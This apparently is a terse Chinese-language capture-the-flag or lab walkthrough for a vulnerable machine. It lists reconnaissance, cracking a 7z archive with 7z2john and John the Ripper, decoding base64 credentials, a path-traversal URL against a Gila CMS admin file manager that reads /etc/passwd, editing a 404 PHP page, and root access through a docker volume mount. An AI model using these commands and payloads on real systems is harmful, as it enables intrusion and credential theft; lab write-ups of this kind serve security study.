一、信息收集
ip、端口、指纹
目录扫描
查看frp文件
密码破解
失败换一个
https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py
python 7z2ctf.py arjun.7z > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show
解码
echo 'Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=' | base64 -d
gila:admin@gmail.com:princesa
查找版本漏洞
http://192.168.152.132/gila/admin/fm/?f=src../../../../etc/passwd
修改文件
创建404php
发现docker
docker run -v /root:/mnt -it alpine
